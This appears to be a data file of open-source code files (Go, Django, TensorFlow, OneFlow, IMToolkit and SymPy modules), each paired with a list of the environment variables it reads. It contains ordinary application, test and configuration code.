// MustNewMember creates a new member instance based on the response of V3 Member Add API.
func (c *Cluster) MustNewMember(t testutil.TB, resp *clientv3.MemberAddResponse) *Member {
m := c.mustNewMember(t)
m.IsLearner = resp.Member.IsLearner
m.NewCluster = false
m.InitialPeerURLsMap = types.URLsMap{}
for _, mm := range c.Members {
m.InitialPeerURLsMap[mm.Name] = mm.PeerURLs
}
m.InitialPeerURLsMap[m.Name] = types.MustNewURLs(resp.Member.PeerURLs)
c.Members = append(c.Members, m)
return m
}
| [
"\"CLUSTER_DEBUG\""
] | [] | [
"CLUSTER_DEBUG"
] | [] | ["CLUSTER_DEBUG"] | go | 1 | 0 | |
manage.py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'postproject.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [] | [] | [] | [] | [] | python | 0 | 0 | |
imtoolkit/imtoolkit.py | # Copyright (c) IMToolkit Development Team
# This toolkit is released under the MIT License, see LICENSE.txt
import re
import sys
import time
from imtoolkit import *
def main():
np.set_printoptions(threshold=np.inf)
title = " IMToolkit Version " + IMTOOLKIT_VERSION + " "
print("=" * len(title) + "\n" + title + "\n" + "=" * len(title))
if os.getenv("USECUPY") == "1":
print("CuPy-aided GPGPU acceleration is activated in your environment.")
print("One can activate the NumPy counterpart by executing")
print("> unset USECUPY")
else:
print("NumPy is used for all the calculations.")
print("The use of CUDA and CuPy is strongly recommended.")
print("One can activate it by executing")
print("> export USECUPY=1")
print("")
if len(sys.argv) <= 1 or (len(sys.argv) == 2 and "-h" in sys.argv[1]):
print("IMToolkit official website: https://ishikawa.cc/imtoolkit/")
print("A detailed tutorial: https://ishikawa.cc/imtoolkit/tutorial.html")
print("Fork me on GitHub: https://github.com/imtoolkit/imtoolkit")
quit()
args = sys.argv[1:]
for arg in args:
lentitle = len(arg) + 6
print("-" * lentitle + "\narg = " + arg + "\n" + "-" * lentitle)
params = Parameters(arg)
# initialize a codebook, which also supports BLAST/OFDM by setting M = K
meanPower = 1 # For the MIMO scenario, the mean power is normalized to 1
if params.channel == "ofdm":
# For the OFDM scenario, the mean power of symbol vectors is normalized to M
meanPower = params.M
if params.code == "symbol":
code = SymbolCode(params.mod, params.L)
elif params.code == "index":
code = IMCode(params.dm, params.M, params.K, params.Q, params.mod, params.L, meanPower)
elif params.code == "OSTBC":
if params.isSpeficied("O"):
code = OSTBCode(params.M, params.mod, params.L, params.O)
else:
code = OSTBCode(params.M, params.mod, params.L)
elif params.code == "DUC":
code = DiagonalUnitaryCode(params.M, params.L)
elif params.code == "ADSM":
if params.isSpeficied("u1"):
code = ADSMCode(params.M, params.mod, params.L, params.u1)
else:
code = ADSMCode(params.M, params.mod, params.L)
elif params.code == "TAST":
code = TASTCode(params.M, params.Q, params.L, params.mod)
# initialize a channel generator
if params.channel == "rayleigh": # quasi-static Rayleigh fading
if re.match(r'.*P$', params.mode):
# Parallel channel
channel = IdealRayleighChannel(params.ITi, params.M, params.N)
else:
# Single channel
channel = IdealRayleighChannel(1, params.M, params.N)
elif params.channel == "ofdm": # ideal frequency-selective OFDM channel
params.N = params.M
if re.match(r'.*P$', params.mode):
# Parallel channel
channel = IdealOFDMChannel(params.ITi, params.M)
else:
# Single channel
channel = IdealOFDMChannel(1, params.M)
elif params.channel == "rice": # ideal Rician fading
# channel parameters, that need to be modified based on your setup
print("bohagen2007los")
frequency = 5.0 * 10**9 # 5 [GHz]
wavelength = frequencyToWavelength(frequency)
height = params.R if params.isSpeficied("R") else 3.0
dTx = params.dTx if params.isSpeficied("dTx") else height / max(params.M, params.N)
print("dTx = %1.2f"%dTx)
rx, ry, rz = IdealRicianChannel.getPositionsUniformLinearArray(params.N, wavelength, 0)
tx, ty, tz = IdealRicianChannel.getPositionsUniformLinearArray(params.M, dTx, height)
#tx, ty, tz = IdealRicianChannel.getPositionsRectangular2d(params.M, wavelength, 3.0)
#rx, ry, rz = IdealRicianChannel.getPositionsRectangular2d(params.N, wavelength, 0.0)
if re.match(r'.*P$', params.mode):
# Parallel channel
channel = IdealRicianChannel(params.ITi, params.Kf, wavelength, tx, ty, tz, rx, ry, rz)
else:
# Single channel
channel = IdealRicianChannel(1, params.Kf, wavelength, tx, ty, tz, rx, ry, rz)
# initialize a simulator
if params.sim == "coh":
sim = CoherentMLDSimulator(code.codes, channel)
elif params.sim == "diff":
sim = DifferentialMLDSimulator(code.codes, channel)
elif params.sim == "sudiff":
sim = SemiUnitaryDifferentialMLDSimulator(code.codes, channel)
elif params.sim == "nsdiff":
E1 = Basis.getGSPE1(params) if params.basis[0] == "g" else None
bases = Basis(params.basis, params.M, params.T, E1=E1).bases
sim = NonSquareDifferentialMLDSimulator(code.codes, channel, bases)
elif params.sim == "nsdiffc" or params.sim == "nsdiffce":
E1 = Basis.getGSPE1(params) if params.basis[0] == "g" else None
txbases = ChaosBasis(params.basis, params.M, params.T, params.W, params.x0, params.Ns, E1 = E1).bases
if params.isSpeficied("d"):
rxbases = ChaosBasis(params.basis, params.M, params.T, params.W, params.x0 + params.d, params.Ns, E1 = E1).bases
else:
rxbases = txbases
sim = NonSquareDifferentialChaosMLDSimulator(code.codes, channel, txbases, rxbases)
start_time = time.time()
if params.mode == "RATE":
code.putRate()
elif params.mode == "MED":
if params.sim == "nsdiff":
print("MED = " + str(getMinimumEuclideanDistance(np.matmul(code.codes, bases[0]))))
else:
print("MED = " + str(getMinimumEuclideanDistance(code.codes)))
elif params.mode == "BER":
sim.simulateBERReference(params)
elif params.mode == "BERP":
sim.simulateBERParallel(params)
elif params.mode == "AMI":
sim.simulateAMIReference(params)
elif params.mode == "AMIP":
sim.simulateAMIParallel(params)
elif params.mode == "VIEW":
if params.sim == "nsdiff":
print(np.matmul(code.codes, bases[0]))
else:
print(code.codes)
elif params.mode == "VIEWIM":
print(np.array(convertIndsToVector(code.inds, params.M)).reshape(-1, params.Q))
print("Minimum Hamming distance = %d" % getMinimumHammingDistance(code.inds, params.M))
print("Inequality L1 = %d" % getInequalityL1(code.inds, params.M))
elif params.mode == "VIEWIMTEX":
print("$\\a$(%d, %d, %d) $=$ [" % (params.M, params.K, params.Q))
es = [", ".join(["%d" % (i+1) for i in iarr]) for iarr in code.inds]
print(", ".join(["[" + e + "]" for e in es]) + "].")
elif params.mode == "CONST":
if params.sim == "nsdiffc":
Nc = code.codes.shape[0]
symbols = np.array([np.matmul(code.codes[i], txbases[:, :, 0]) for i in range(Nc)]).reshape(-1)
elif params.sim == "nsdiff":
symbols = np.matmul(code.codes, bases[0]).reshape(-1)
else:
symbols = code.codes.reshape(-1)
df = {"real": np.real(symbols), "imag": np.imag(symbols)}
Simulator.saveCSV(arg, df)
elif params.mode == "SEARCH":
if params.code == "TAST":
TASTCode.search(params.M, params.Q, params.L)
elapsed_time = time.time() - start_time
print ("Elapsed time = %.10f seconds" % (elapsed_time))
if __name__ == '__main__':
main()
| [] | [] | [
"USECUPY"
] | [] | ["USECUPY"] | python | 1 | 0 | |
python/django/app/wsgi.py | """
WSGI config for bl project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings")
application = get_wsgi_application()
| [] | [] | [] | [] | [] | python | 0 | 0 | |
wsgi.py | """
WSGI config for Finetooth project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings")
from django.core.wsgi import get_wsgi_application
if os.path.exists(".development"):
application = get_wsgi_application()
else:
from dj_static import Cling
application = Cling(get_wsgi_application())
| [] | [] | [] | [] | [] | python | 0 | 0 | |
mydeepctr/examples/lr/controller.py | '''
@Author: your name
@Date: 2020-05-27 14:53:55
@LastEditTime: 2020-06-09 13:07:02
@LastEditors: Please set LastEditors
@Description: In User Settings Edit
@FilePath: /model-building/recommend/estimator/lr.py
'''
import tensorflow as tf
import os
import sys
import json
import argparse
tf.logging.set_verbosity(tf.logging.INFO)
# ================================= 预先写好tfrecord =================================
parser = argparse.ArgumentParser()
parser.add_argument("--tfrecord_dir", type=str, default="../data/")
parser.add_argument("--project_dir", type=str, default=None)
parser.add_argument("--output_dir", type=str, default=None)
parser.add_argument("--mode", type=str, default='train')
parser.add_argument("--dense_cols", type=str, default=None)
parser.add_argument("--sparse_cols", type=str, default=None)
parser.add_argument("--seq_cols", type=str, default=None)
parser.add_argument("--target", type=str, default=None)
parser.add_argument("--vocab_list", type=str, default=None)
parser.add_argument("--exclude", type=str, default="")
parser.add_argument("--batch_size", type=int, default=10)
parser.add_argument("--learning_rate", type=float, default=0.001)
parser.add_argument("--num_epoches", type=int, default=10)
parser.add_argument("--num_examples", type=int, default=100)
parser.add_argument('--use_bn', action='store_true', default=False)
parser.add_argument('--use_deep', action='store_true', default=False)
parser.add_argument("--log_step_count_steps", type=int, default=1000)
parser.add_argument("--save_checkpoints_steps", type=int, default=1000)
parser.add_argument("--summary_save_dir", type=str, default='./log/summary/')
parser.add_argument("--summary_every_n_step", type=int, default=1000)
parser.add_argument("--ckpt_save_dir", type=str, default='./log/summary/')
args = parser.parse_args()
sys.path.append(args.project_dir)
from models.lr import LRConfig
from inputs import DenseFeature, SparseFeature
from model import model_fn_builder
from data import tfrecord2fn,csv2tfrecord
# ================================= 环境配置 =================================
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
num_train_steps = args.num_examples / args.batch_size * args.num_epoches
# ================================= 模型定义 =================================
if args.dense_cols is None:
dense_features = []
else:
dense_features = [f.strip() for f in args.dense_cols.split(',')]
if args.sparse_cols is None:
sparse_features = []
vocab_list = []
vocab_dict = {}
else:
sparse_features = [f.strip() for f in args.sparse_cols.split(',')]
vocab_list = [int(v.strip()) for v in args.vocab_list.split(',')]
vocab_dict = {feat:vocab_list[idx] for idx, feat in enumerate(sparse_features)}
sparse_feature_columns = [SparseFeature(feature_name=feat, vocab_size=vocab_dict[feat], embedding_dim=3) for feat in sparse_features]
dense_feature_columns = [DenseFeature(feature_name=feat) for feat in dense_features]
dnn_feature_columns = dense_feature_columns + sparse_feature_columns
linear_feature_columns = dense_feature_columns + sparse_feature_columns
model_config = LRConfig(dnn_feature_columns, linear_feature_columns, class_num=2)
model_fn = model_fn_builder(
model_config=model_config,
learning_rate=args.learning_rate,
init_checkpoint=None,
summary_save_dir=args.summary_save_dir,
summary_every_n_step=args.summary_every_n_step,
task='binary_classification'
)
# ================================= estimator配置 =================================
session_config = tf.ConfigProto(allow_soft_placement=True)
run_config = tf.estimator.RunConfig(
log_step_count_steps=args.log_step_count_steps,
save_checkpoints_steps=args.save_checkpoints_steps,
session_config=session_config,
model_dir=args.ckpt_save_dir
)
estimator = tf.estimator.Estimator(
model_fn=model_fn,
model_dir=args.ckpt_save_dir,
params={},
config=run_config
)
# ================================= estimator执行 =================================
# ======================== 构建输入 ========================
# 配置tfrecord的数据结构格式
name2features = {}
for f in sparse_features:
name2features[f] = tf.io.FixedLenFeature([], tf.int64)
for f in dense_features:
name2features[f] = tf.io.FixedLenFeature([], tf.float32)
for f in [args.target]:
name2features[f] = tf.io.FixedLenFeature([], tf.float32)
if args.mode == 'train':
train_input_fn = tfrecord2fn(os.path.join(args.tfrecord_dir, 'train.tfrecord'), name2features, args.batch_size, args.num_epoches,drop_remainder=True, mode=tf.estimator.ModeKeys.TRAIN, target=args.target)
elif args.mode == 'eval':
eval_input_fn = tfrecord2fn(os.path.join(args.tfrecord_dir, 'eval.tfrecord'), name2features, args.batch_size, args.num_epoches, drop_remainder=True, mode=tf.estimator.ModeKeys.EVAL, target=args.target)
elif args.mode == 'test':
eval_input_fn = tfrecord2fn(os.path.join(args.tfrecord_dir, 'eval.tfrecord'), name2features, args.batch_size, args.num_epoches, drop_remainder=True, mode=tf.estimator.ModeKeys.PREDICT, target=args.target)
# ======================== 进行训练 ========================
try:
early_stopping_hook = tf.estimator.experimental.stop_if_no_decrease_hook(
estimator=estimator,
metric_name='eval_loss',
max_steps_without_decrease=1000,
run_every_secs=None,
run_every_steps=1000
)
except:
early_stopping_hook = tf.contrib.estimator.stop_if_no_decrease_hook(
estimator=estimator,
metric_name='eval_loss',
max_steps_without_decrease=1000,
run_every_secs=None,
run_every_steps=1000
)
if args.mode == 'train':
estimator.train(train_input_fn, max_steps=num_train_steps)
elif args.mode == 'eval':
res = estimator.evaluate(eval_input_fn)
print(res)
res = {k:float(res[k]) for k in res}
if not os.path.exists(args.output_dir):
os.makedirs(args.output_dir)
with open(os.path.join(args.output_dir, 'result.json'), 'w') as f:
json.dump(res, f)
| [] | [] | [
"CUDA_VISIBLE_DEVICES"
] | [] | ["CUDA_VISIBLE_DEVICES"] | python | 1 | 0 | |
python/oneflow/compatible/single_client/test/ops/test_hardsigmoid.py | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import random
import unittest
from collections import OrderedDict
from typing import Dict
import numpy as np
from test_util import GenArgList
import oneflow.compatible.single_client.unittest
from oneflow.compatible import single_client as flow
from oneflow.compatible.single_client import typing as tp
def _compare_hardsigmoid_with_np(
input_shape, device_type, value_type, machine_ids, device_counts
):
if value_type[1] == flow.float16:
input_1 = np.random.uniform(-3.5, 3.5, size=input_shape).astype(np.float16)
input_1 += np.random.randn(*input_shape).astype(np.float16)
input_1 = np.array(input_1, dtype=value_type[0])
else:
input_1 = np.random.uniform(-3.5, 3.5, size=input_shape).astype(value_type[0])
input_1 += np.random.randn(*input_shape).astype(value_type[0])
assert device_type in ["cpu", "gpu"]
flow.clear_default_session()
if device_type == "cpu":
flow.config.cpu_device_num(device_counts)
else:
flow.config.gpu_device_num(device_counts)
func_config = flow.FunctionConfig()
func_config.default_placement_scope(flow.scope.placement(device_type, machine_ids))
if value_type[1] == flow.float16:
func_config.default_data_type(flow.float32)
else:
func_config.default_data_type(value_type[1])
def np_hardsigmoid(input):
input_shape = input.shape
input = input.flatten()
elem_cnt = input.size
_zero = np.zeros_like(input)
for i in range(elem_cnt):
if input[i] >= 3:
_zero[i] = 1
elif input[i] <= -3:
_zero[i] = 0
else:
_zero[i] = input[i] / 6 + 0.5
np_hsigmoid_out = np.reshape(_zero, newshape=input_shape)
return np.array(np_hsigmoid_out).astype(value_type[0])
np_out_hardsigmoid = np_hardsigmoid(input_1)
def np_diff(input):
input_shape = input.shape
input = input.flatten()
elem_cnt = input.size
diff = np.zeros(shape=(elem_cnt,), dtype=value_type[0])
for i in range(elem_cnt):
if input[i] > -3 and input[i] < 3:
diff[i] = 1 / 6
diff = np.reshape(diff, newshape=input_shape)
return diff
_np_grad = np_diff(input_1)
def assert_prediction_grad(blob: tp.Numpy):
if value_type[1] == flow.float16:
assert np.allclose(blob, _np_grad, atol=0.001)
else:
assert np.allclose(blob, _np_grad, atol=1e-05)
if value_type[1] == flow.float16:
@flow.global_function(type="train", function_config=func_config)
def oneflow_hardsigmoid(
of_input_1: tp.Numpy.Placeholder(shape=input_1.shape, dtype=flow.float32)
) -> tp.Numpy:
with flow.scope.placement(device_type, "0:0"):
v = flow.get_variable(
shape=input_1.shape,
dtype=flow.float32,
initializer=flow.zeros_initializer(),
name="x_var",
)
x_var = of_input_1 + v
x_f16 = flow.cast(x_var, flow.float16)
of_hardsigmoid_out_f16 = flow.nn.hardsigmoid(x_f16)
of_hardsigmoid_out_f32 = flow.cast(of_hardsigmoid_out_f16, flow.float32)
with flow.scope.placement(device_type, "0:0"):
flow.optimizer.SGD(
flow.optimizer.PiecewiseConstantScheduler([], [0.001]), momentum=0
).minimize(of_hardsigmoid_out_f32)
flow.watch_diff(x_var, assert_prediction_grad)
return of_hardsigmoid_out_f32
else:
@flow.global_function(type="train", function_config=func_config)
def oneflow_hardsigmoid(
of_input_1: tp.Numpy.Placeholder(shape=input_1.shape, dtype=value_type[1])
) -> tp.Numpy:
with flow.scope.placement(device_type, "0:0"):
v = flow.get_variable(
shape=input_1.shape,
dtype=value_type[1],
initializer=flow.zeros_initializer(),
name="x_var",
)
x_var = of_input_1 + v
flow.watch_diff(x_var, assert_prediction_grad)
of_hardsigmoid_out = flow.nn.hardsigmoid(x_var)
with flow.scope.placement(device_type, "0:0"):
flow.optimizer.SGD(
flow.optimizer.PiecewiseConstantScheduler([], [0.001]), momentum=0
).minimize(of_hardsigmoid_out)
return of_hardsigmoid_out
of_out_hardsigmoid = oneflow_hardsigmoid(input_1)
if value_type[1] == flow.float16:
assert np.allclose(of_out_hardsigmoid, np_out_hardsigmoid, atol=0.01)
else:
assert np.allclose(of_out_hardsigmoid, np_out_hardsigmoid, atol=1e-05)
def _gen_arg_dict(shape, device_type, value_type, machine_ids, device_counts):
arg_dict = OrderedDict()
arg_dict["input_shape"] = [shape]
arg_dict["device_type"] = [device_type]
if value_type == "float" and device_type == "cpu":
arg_dict["value_type"] = [
(np.float32, flow.float32),
(np.float64, flow.float64),
]
else:
arg_dict["value_type"] = [
(np.float32, flow.float16),
(np.float32, flow.float32),
(np.float64, flow.float64),
]
arg_dict["machine_ids"] = [machine_ids]
arg_dict["device_counts"] = [device_counts]
return arg_dict
@flow.unittest.skip_unless_1n1d()
class Testhardsigmoid1n1d(flow.unittest.TestCase):
def test_hardsigmoid_cpu(test_case):
arg_dict = _gen_arg_dict(
shape=(3, 16),
device_type="cpu",
value_type="float",
machine_ids="0:0",
device_counts=1,
)
for arg in GenArgList(arg_dict):
_compare_hardsigmoid_with_np(*arg)
@unittest.skipIf(os.getenv("ONEFLOW_TEST_CPU_ONLY"), "only test cpu cases")
def test_hardsigmoid_gpu(test_case):
arg_dict = _gen_arg_dict(
shape=(16, 16),
device_type="gpu",
value_type="float",
machine_ids="0:0",
device_counts=1,
)
for arg in GenArgList(arg_dict):
_compare_hardsigmoid_with_np(*arg)
@flow.unittest.skip_unless_1n2d()
class Testhardsigmoid1n2d(flow.unittest.TestCase):
@unittest.skipIf(os.getenv("ONEFLOW_TEST_CPU_ONLY"), "only test cpu cases")
def test_hardsigmoid_gpu_1n2d(test_case):
arg_dict = _gen_arg_dict(
shape=(4, 8, 16),
device_type="gpu",
value_type="float",
machine_ids="0:0-1",
device_counts=2,
)
for arg in GenArgList(arg_dict):
_compare_hardsigmoid_with_np(*arg)
if __name__ == "__main__":
unittest.main()
| [] | [] | [
"ONEFLOW_TEST_CPU_ONLY"
] | [] | ["ONEFLOW_TEST_CPU_ONLY"] | python | 1 | 0 | |
app/app/settings.py | """
Django settings for app project.
Generated by 'django-admin startproject' using Django 3.0.8.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = "2*)z@*h^wn!k-3)fu(4q_^87t3e#hd#g&42_5ra4g8s(7d&+e5"
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"rest_framework",
"rest_framework.authtoken",
"core",
"user",
]
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
ROOT_URLCONF = "app.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
],
},
},
]
WSGI_APPLICATION = "app.wsgi.application"
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
"default": {
"ENGINE": "django.db.backends.postgresql",
"HOST": os.environ.get("DB_HOST", "localhost"),
"NAME": os.environ.get("DB_NAME", "app"),
"USER": os.environ.get("DB_USER", "postgres"),
"PASSWORD": os.environ.get("DB_PASS", "foobar"),
"PORT": os.environ.get("DB_PORT", "5433"),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
},
{"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",},
{"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",},
{"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = "/static/"
AUTH_USER_MODEL = "core.User"
| [] | [] | [
"DB_HOST",
"DB_PORT",
"DB_NAME",
"DB_PASS",
"DB_USER"
] | [] | ["DB_HOST", "DB_PORT", "DB_NAME", "DB_PASS", "DB_USER"] | python | 5 | 0 | |
sympy/__init__.py | """
SymPy is a Python library for symbolic mathematics. It aims to become a
full-featured computer algebra system (CAS) while keeping the code as simple
as possible in order to be comprehensible and easily extensible. SymPy is
written entirely in Python. It depends on mpmath, and other external libraries
may be optionally for things like plotting support.
See the webpage for more information and documentation:
https://sympy.org
"""
import sys
if sys.version_info < (3, 6):
raise ImportError("Python version 3.6 or above is required for SymPy.")
del sys
try:
import mpmath
except ImportError:
raise ImportError("SymPy now depends on mpmath as an external library. "
"See https://docs.sympy.org/latest/install.html#mpmath for more information.")
del mpmath
from sympy.release import __version__
if 'dev' in __version__:
def enable_warnings():
import warnings
warnings.filterwarnings('default', '.*', DeprecationWarning, module='sympy.*')
del warnings
enable_warnings()
del enable_warnings
def __sympy_debug():
# helper function so we don't import os globally
import os
debug_str = os.getenv('SYMPY_DEBUG', 'False')
if debug_str in ('True', 'False'):
return eval(debug_str)
else:
raise RuntimeError("unrecognized value for SYMPY_DEBUG: %s" %
debug_str)
SYMPY_DEBUG = __sympy_debug() # type: bool
from .core import (sympify, SympifyError, cacheit, Basic, Atom,
preorder_traversal, S, Expr, AtomicExpr, UnevaluatedExpr, Symbol,
Wild, Dummy, symbols, var, Number, Float, Rational, Integer,
NumberSymbol, RealNumber, igcd, ilcm, seterr, E, I, nan, oo, pi, zoo,
AlgebraicNumber, comp, mod_inverse, Pow, integer_nthroot, integer_log,
Mul, prod, Add, Mod, Rel, Eq, Ne, Lt, Le, Gt, Ge, Equality,
GreaterThan, LessThan, Unequality, StrictGreaterThan, StrictLessThan,
vectorize, Lambda, WildFunction, Derivative, diff, FunctionClass,
Function, Subs, expand, PoleError, count_ops, expand_mul, expand_log,
expand_func, expand_trig, expand_complex, expand_multinomial, nfloat,
expand_power_base, expand_power_exp, arity, PrecisionExhausted, N,
evalf, Tuple, Dict, gcd_terms, factor_terms, factor_nc, evaluate,
Catalan, EulerGamma, GoldenRatio, TribonacciConstant)
from .logic import (to_cnf, to_dnf, to_nnf, And, Or, Not, Xor, Nand, Nor,
Implies, Equivalent, ITE, POSform, SOPform, simplify_logic, bool_map,
true, false, satisfiable)
from .assumptions import (AppliedPredicate, Predicate, AssumptionsContext,
assuming, Q, ask, register_handler, remove_handler, refine)
from .polys import (Poly, PurePoly, poly_from_expr, parallel_poly_from_expr,
degree, total_degree, degree_list, LC, LM, LT, pdiv, prem, pquo,
pexquo, div, rem, quo, exquo, half_gcdex, gcdex, invert,
subresultants, resultant, discriminant, cofactors, gcd_list, gcd,
lcm_list, lcm, terms_gcd, trunc, monic, content, primitive, compose,
decompose, sturm, gff_list, gff, sqf_norm, sqf_part, sqf_list, sqf,
factor_list, factor, intervals, refine_root, count_roots, real_roots,
nroots, ground_roots, nth_power_roots_poly, cancel, reduced, groebner,
is_zero_dimensional, GroebnerBasis, poly, symmetrize, horner,
interpolate, rational_interpolate, viete, together,
BasePolynomialError, ExactQuotientFailed, PolynomialDivisionFailed,
OperationNotSupported, HeuristicGCDFailed, HomomorphismFailed,
IsomorphismFailed, ExtraneousFactors, EvaluationFailed,
RefinementFailed, CoercionFailed, NotInvertible, NotReversible,
NotAlgebraic, DomainError, PolynomialError, UnificationFailed,
GeneratorsError, GeneratorsNeeded, ComputationFailed,
UnivariatePolynomialError, MultivariatePolynomialError,
PolificationFailed, OptionError, FlagError, minpoly,
minimal_polynomial, primitive_element, field_isomorphism,
to_number_field, isolate, itermonomials, Monomial, lex, grlex,
grevlex, ilex, igrlex, igrevlex, CRootOf, rootof, RootOf,
ComplexRootOf, RootSum, roots, Domain, FiniteField, IntegerRing,
RationalField, RealField, ComplexField, PythonFiniteField,
GMPYFiniteField, PythonIntegerRing, GMPYIntegerRing, PythonRational,
GMPYRationalField, AlgebraicField, PolynomialRing, FractionField,
ExpressionDomain, FF_python, FF_gmpy, ZZ_python, ZZ_gmpy, QQ_python,
QQ_gmpy, GF, FF, ZZ, QQ, ZZ_I, QQ_I, RR, CC, EX, EXRAW,
construct_domain, swinnerton_dyer_poly, cyclotomic_poly,
symmetric_poly, random_poly, interpolating_poly, jacobi_poly,
chebyshevt_poly, chebyshevu_poly, hermite_poly, legendre_poly,
laguerre_poly, apart, apart_list, assemble_partfrac_list, Options,
ring, xring, vring, sring, field, xfield, vfield, sfield)
from .series import (Order, O, limit, Limit, gruntz, series, approximants,
residue, EmptySequence, SeqPer, SeqFormula, sequence, SeqAdd, SeqMul,
fourier_series, fps, difference_delta, limit_seq)
from .functions import (factorial, factorial2, rf, ff, binomial,
RisingFactorial, FallingFactorial, subfactorial, carmichael,
fibonacci, lucas, motzkin, tribonacci, harmonic, bernoulli, bell, euler,
catalan, genocchi, partition, sqrt, root, Min, Max, Id, real_root,
cbrt, re, im, sign, Abs, conjugate, arg, polar_lift,
periodic_argument, unbranched_argument, principal_branch, transpose,
adjoint, polarify, unpolarify, sin, cos, tan, sec, csc, cot, sinc,
asin, acos, atan, asec, acsc, acot, atan2, exp_polar, exp, ln, log,
LambertW, sinh, cosh, tanh, coth, sech, csch, asinh, acosh, atanh,
acoth, asech, acsch, floor, ceiling, frac, Piecewise, piecewise_fold,
erf, erfc, erfi, erf2, erfinv, erfcinv, erf2inv, Ei, expint, E1, li,
Li, Si, Ci, Shi, Chi, fresnels, fresnelc, gamma, lowergamma,
uppergamma, polygamma, loggamma, digamma, trigamma, multigamma,
dirichlet_eta, zeta, lerchphi, polylog, stieltjes, Eijk, LeviCivita,
KroneckerDelta, SingularityFunction, DiracDelta, Heaviside,
bspline_basis, bspline_basis_set, interpolating_spline, besselj,
bessely, besseli, besselk, hankel1, hankel2, jn, yn, jn_zeros, hn1,
hn2, airyai, airybi, airyaiprime, airybiprime, marcumq, hyper,
meijerg, appellf1, legendre, assoc_legendre, hermite, chebyshevt,
chebyshevu, chebyshevu_root, chebyshevt_root, laguerre,
assoc_laguerre, gegenbauer, jacobi, jacobi_normalized, Ynm, Ynm_c,
Znm, elliptic_k, elliptic_f, elliptic_e, elliptic_pi, beta, mathieus,
mathieuc, mathieusprime, mathieucprime, riemann_xi, betainc, betainc_regularized)
from .ntheory import (nextprime, prevprime, prime, primepi, primerange,
randprime, Sieve, sieve, primorial, cycle_length, composite,
compositepi, isprime, divisors, proper_divisors, factorint,
multiplicity, perfect_power, pollard_pm1, pollard_rho, primefactors,
totient, trailing, divisor_count, proper_divisor_count, divisor_sigma,
factorrat, reduced_totient, primenu, primeomega,
mersenne_prime_exponent, is_perfect, is_mersenne_prime, is_abundant,
is_deficient, is_amicable, abundance, npartitions, is_primitive_root,
is_quad_residue, legendre_symbol, jacobi_symbol, n_order, sqrt_mod,
quadratic_residues, primitive_root, nthroot_mod, is_nthpow_residue,
sqrt_mod_iter, mobius, discrete_log, quadratic_congruence,
binomial_coefficients, binomial_coefficients_list,
multinomial_coefficients, continued_fraction_periodic,
continued_fraction_iterator, continued_fraction_reduce,
continued_fraction_convergents, continued_fraction, egyptian_fraction)
from .concrete import product, Product, summation, Sum
from .discrete import (fft, ifft, ntt, intt, fwht, ifwht, mobius_transform,
inverse_mobius_transform, convolution, covering_product,
intersecting_product)
from .simplify import (simplify, hypersimp, hypersimilar, logcombine,
separatevars, posify, besselsimp, kroneckersimp, signsimp, bottom_up,
nsimplify, FU, fu, sqrtdenest, cse, use, epath, EPath, hyperexpand,
collect, rcollect, radsimp, collect_const, fraction, numer, denom,
trigsimp, exptrigsimp, powsimp, powdenest, combsimp, gammasimp,
ratsimp, ratsimpmodprime)
